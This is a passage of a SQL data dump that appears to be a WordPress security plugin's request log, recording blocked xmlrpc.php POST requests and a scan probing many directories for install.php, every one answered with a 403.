Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','VjuCp4AY96aWBQZ2mv8ltJ3g',0,1681679659.5459,583,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','34rQDg0Flny9fsq7AvUIZbHE',0,1681679667.2484,550,'','POST',403,0,515,0,1,'',0),('52.69.122.222',876968670,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','6dPb2q9onNGmI4hEULYTBSvt',0,1681679675.1377,550,'','POST',403,0,515,0,1,'',0),('101.34.78.12',1696747020,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','OKAxRfhmyEjkuwiNz1LCbJ7c',0,1681679683.9822,853,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','PY32XLwdjGWvqbg1iJoVyCZr',0,1681679696.4142,1276,'','POST',403,0,515,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/includes/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','wkDEpUdKXsqB49SuM7RQmrLA',0,1681680607.3244,1544,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','4iS1wgQWhefK50kxdRlJv3FZ',0,1681680610.3390,296,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/css/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','a7FKrJhRMpIc6TOgtm40Uo5E',0,1681680613.4305,288,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/images/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','gX5uksEZ7eH294DpaP8bVGTM',0,1681680615.4300,953,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-content/languages/plugins/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','FbYRglIhHz2j1rqZWQSABKEG',0,1681680618.0421,514,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/images/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','SzOimEQMXj8hVNGkealBnH6t',0,1681680620.1695,310,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/user/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','vo2FASsO89Vi5Kpq4YcmMuxl',0,1681680621.9380,282,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-content/languages/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Cb5Rtsm3qWNvDXOJ2I6y8Y9c',0,1681680623.6722,285,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-content/upgrade/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','t1f7RyMmbu43oCJn5Lqz0jFO',0,1681680625.4063,298,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-content/uploads/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nC3oeYFp2yHsczK9XgqTmWNk',0,1681680627.2282,286,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/network/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','zMtGhNdIfTWOcxbauZpC9nr1',0,1681680629.0708,347,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/js/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','kF2Ry53XCSjUEIGMesHz4bPB',0,1681680630.9039,283,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','pJ35Q6m2k7TtHCvyqzWwDYxc',0,1681680632.7590,316,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/colors/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','gzbYiGjN1aoLrvfQKSVByxRO',0,1681680634.7157,282,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/maint/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','WkUwJ2jr70uzg9Madqxl5Bhp',0,1681680636.5755,291,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-content/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','DfbUNwzv9VYsZcPChp7JEn1k',0,1681680638.2043,305,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/colors/blue/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','j6GCXFbQhBopD5qJg4Omdiry',0,1681680639.9374,300,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/colors/coffee/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','XD2nkxEmA1VbqKjwlodU49fG',0,1681680641.6156,282,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/colors/ectoplasm/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','DqxO64iTEVmuSpQdg18fKokP',0,1681680643.3074,306,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/colors/midnight/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','CJXpoU9D1lOWYgHKhStwQ2zm',0,1681680645.0794,302,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/colors/modern/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','DAher7PNG8BtfzViwMXyCR90',0,1681680646.7484,290,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/images/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','UcYgej32LvawxMtr7lZuAzEy',0,1681680649.5427,312,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/css/colors/ocean/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Gz1YTiaU04kunImBH9ldyQZW',0,1681680651.2876,293,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-admin/js/widgets/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','T2tsCEhYNuK1c7RxywaX6OrV',0,1681680653.2571,877,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/customize/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','6swQdq3gmnZEoUaACb9eST2J',0,1681680655.5944,290,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/pomo/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','hXRtTzZ7vigG8Of1QlNrBD2e',0,1681680657.4100,283,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/ID3/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','PhnypxMkmegdEtR4ZrXB0fOU',0,1681680659.1311,303,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/IXR/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','roTXVGsdlhA9OZMHzpLtnbu6',0,1681680660.8004,282,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/PHPMailer/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nivzw5oKT27XSVtDIkFgl1mu',0,1681680662.4743,273,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/Requests/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','1eBxOEGbTLsDt6XNHdPKQpyR',0,1681680664.1526,287,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/SimplePie/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','t4zP2nVh8HADQrGLbYIxkFfT',0,1681680665.8607,322,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/Text/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','NL9eFX8Uv7lHDqyCjsm1uk2o',0,1681680667.4647,304,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/assets/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','J2BUn5I8s0vtXTfxLFlYDOp4',0,1681680669.2699,272,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/block-patterns/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Lyh6JV8lZa97NPCe42tzFW3b',0,1681680671.0791,694,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/block-supports/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','3BvZT8V0HuKeG9NqwsxW45Yl',0,1681680673.1671,288,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/blocks/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','S4jODL539fFvlRc1PATsCrhn',0,1681680674.8232,291,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/certificates/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','jys1rnVT5plW7LuGaH9CKRYq',0,1681680676.6830,293,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/css/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','vXNduEyK7Qsh3LYB02giSnxC',0,1681680678.3344,283,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/fonts/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','hE32NF9jTvH4WucnsIoVb0el',0,1681680680.0474,274,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/js/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ENIt6gcuFOPqYVLQdRlZn1G0',0,1681680681.7083,268,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/php-compat/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','CI37qpcV2wJxedMkPYnUXFSr',0,1681680683.4546,613,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/random_compat/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Hpe1Zoc9IbNqJmkvQPrBtVuW',0,1681680685.6775,492,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/rest-api/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','jCI3QpcB1xXGfJ9FDtelh8wb',0,1681680687.5789,295,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/sitemaps/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ACjSJZkHEXrs2YM7fqh3PbQl',0,1681680689.2684,293,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/sodium_compat/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','LB0QNMAroZjRuk7xWibDwItH',0,1681680690.9539,276,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/style-engine/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','lny0QrcWARsVemdOx827HUbT',0,1681680692.5840,283,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/theme-compat/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','dTgcvreFR2qa57kiS4Wm1MXf',0,1681680694.1729,286,'','GET',403,0,700,0,1,'',0),('89.33.44.247',1495346423,'','http://cmdev-site1.com/wp-includes/widgets/install.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','4LMuxZVrCBX0qcDl5as2KR6d',0,1681680695.8451,298,'','GET',403,0,700,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','49ybFwlf6PWsBZAn7CQi1qgJ',0,1681683075.2896,636,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','tGZNpSoTJ0BQfIb4LiXKqM1u',0,1681683079.2948,584,'','POST',403,0,515,0,1,'',0),('91.204.46.73',1540107849,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','GpWtkXuvZAI4cOQn25gwfxjd',0,1681683080.3142,613,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','8ZujwaAlbM0LJCmvIXryd5z6',0,1681683084.8133,566,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','SPTz8WhJAxak9eKugcsjDNR7',0,1681685613.8946,2020,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','FSoE7JGzmftTHgOiw6DWlM2v',0,1681685612.8955,3713,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','IJfgGnNRULmzqMovKk6DshYw',0,1681685617.9072,632,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','su8WjI2oM4DryZ90YqnQdP7T',0,1681685621.0979,563,'','POST',403,0,515,0,1,'',0),('52.69.122.222',876968670,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','YqxsTf8aGetJHdLzo5IpV4yk',0,1681685629.7645,569,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','nP4oqDKlgExetAa1u9TFWLvr',0,1681685630.9050,573,'','POST',403,0,515,0,1,'',0),('198.71.52.97',3326555233,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','VuOIE5GvBp08goUP3TFCjmQL',0,1681685640.0475,562,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','uzDClpifYh1UFWcJbKev7tGT',0,1681687202.1979,754,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','8B0fpHK3DRU1xauV62YzvyNq',0,1681687207.6049,578,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','LhvGEObNPWRd89oI1Ht0quMj',0,1681687210.8617,608,'','POST',403,0,515,0,1,'',0),('157.230.250.100',2649160292,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','3trU5bQkAwhW6B0Xl8Zm9vLn',0,1681687211.8632,545,'','POST',403,0,515,0,1,'',0),('51.161.94.36',866213412,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','OsIbwVeAZT9hEUGjkcufodHx',0,1681687220.2649,554,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','hny67bR4FSBfUT1XjOP93WLK',0,1681687224.5778,567,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','nER4pIuYoQbZyhA7P3FBH9gc',0,1681687228.0325,562,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','sg2Or1nYS6JVxqXFtiWPl4MC',0,1681687234.7773,545,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 